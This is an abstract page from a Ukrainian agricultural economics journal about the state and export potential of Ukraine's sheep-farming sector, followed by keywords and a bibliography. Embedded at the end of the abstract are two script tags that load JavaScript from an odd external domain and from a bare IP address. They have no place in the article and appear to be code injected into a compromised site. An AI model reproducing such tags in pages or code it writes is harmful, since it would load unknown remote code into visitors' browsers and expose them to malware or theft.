ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 339.564:636.32(477)
Аграрна політика і реформування

Стан і шляхи підвищення експортного потенціалу галузі вівчарства України / Ібатуллін І. І., Пабат В.О., Туринський В. М. // Економіка АПК. - 2014. - № 3 - С. 13

Проаналізовано розвиток виробництва продукції вівчарства у світі з 1950 року та в Україні за останні 180 років. Окреслено основні причини злетів і падінь вітчизняного вівчарства, визначено перспективні напрями продуктивності в умовах, що склалися на внутрішньому й світовому ринках. На основі технологічної оцінки економічної ефективності використання спеціалізованих м’ясних, молочних і багатоплідних порід овець розроблену мережу високотехнологічних модулів вівцеферм перспективних напрямів продуктивності для усіх природно-економічних зон, а також структурну схему формування конкурентоспроможного виробництва продукції вівчарства та козівництва в Україні. Запропоновано дієву регуляторну політику для стрімкого підвищення експортного потенціалу галузі вівчарства України. Враховуючи позитивний торговельний баланс на користь імпорту в Європі й Азії, Україна має усі передумови і шанси для формування експортного потенціалу баранини до 100-200 тис. т у забійній масі. Табл.: 4. Рис.: 5. Бібліогр.: 18.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: породи овець, селекція, напрями продуктивності, вовна, баранина, молоко, первинна обробка, поглиблена переробка, конкурентоспроможність, експортний потенціал галузі, програма розвитку вівчарства, державна регуляторна політика

Список використаних джерел

 1. Данкверт С.А. Овцеводство стран мира / С.А. Данкверт, А.М. Холметов, О.Ю. Осадчая. – М.: ГНУ ВИЖ Россельхозакадемии, 2010. – 508 с.
 2. Месель-Веселяк В.Я. Поголів’я і виробництво продукції тваринництва в Україні / В.Я. Месель-Веселяк, О.Ю. Грищенко. – К.: ННЦ ІАЕ, 2013. – 146 с.
 3. Ібатуллін І.І. Механізми реалізації та напрями розвитку галузей молочного скотарства і свинарства України на перспективу до 2015 року: [навч. видання] / І.І. Ібатуллін, В.А. Марченко, В.В. Бовсуновський, А.А. Гетя. – Х.: Елтон-2, 2013. – 160 с.
 4. Монографія України: [моногр.] / В.М. Іовенко, П.І. Польська, О.Г. Антонець та ін. – К.: Аграрна наука. – 2006. – 612 с.
 5. Мороз В.А. Овцеводство и козоводство / В.А. Мороз – Ставрополь. Ставропольское кн. изд-во – 2002. – С. 256.
 6. Програма розвитку галузі вівчарства України на 2012-2020 рр. / відпов. за вип. Ю.В. Вдовиченко. – Нова Каховка: «Пиел», 2013. – 62 с.
 7. Трофименко О.Л. Розвиток генетики в Україні / О.Л. Трофименко, В.О. Пабат, Д.Т. Віннічук. – К.: «Техніка», 2008. – 16 с.
 8. Туринський В.М. Технологія виробництва овечих сирів в колективних і фермерських господарствах / В.М. Туринський, О.Д. Горлова, Є.П. Тимофієв. – К.: БМТ, – 2000. – 136 с.
 9. М'ясо-молочне вівчарство: підруч. [для студ. вищ. навч. закл.] / В.М. Туринський, І.І. Антонік, Г.П. Бондаренко, В.І. Похил. – К.: Грамота, 2010. – 440 с.
 10. Пабат В.А. Животноводство: сырьевая база и продовольственная безопасность Украины / В.А. Пабат // Молочная промышленность Украины. – 2003. – № 5. – С. 30-35.
 11. Штомпель М.В. Технологія виробництва продукції вівчарства: навч. вид. [для студ. вищ. навч. закл.] / М.В. Штомпель, Б.О. Вовченко. – К.: Вища освіта, 2005. – 344 с.
 12. Marceau J. Budorcas taxicolor / J. Marceau // Animal Diversity Web. – 2008. http://animaldiversity.ummz.umich.edu/site/accounts/information/Budorcas taxicolor. html.
 13. Mason I.L. Evolution of domesticated animals / I.L. Mason // Longman Group Limited, Essex, 1984.
 14. Mason I.L. A World Dictionary of Livestock breeds, types and varieties // C. A. B. International, UK, 1988.
 15. Minelli A. The Great Book of Animals / A. Minelli, M. Minelli. – Philadelphia, Courage Books, 1977.
 16. New Zealand sheep breeds. URL: http://www.teara.govt.nz/en/sheep-farming/6
 17. Sheep production handbook /American Sheep Industry Association, Inc. – 2002 Edition, Vol. 7. – 1060 p.
 18. The State of the World,s Animal Genetic Resources for Food and Agriculture. Edited by Barbara Rischkowsky and Dafydd Pilling //FAO, Rome, 2007. – 511 p.
Читати статтю: 14_03_13-23.pdf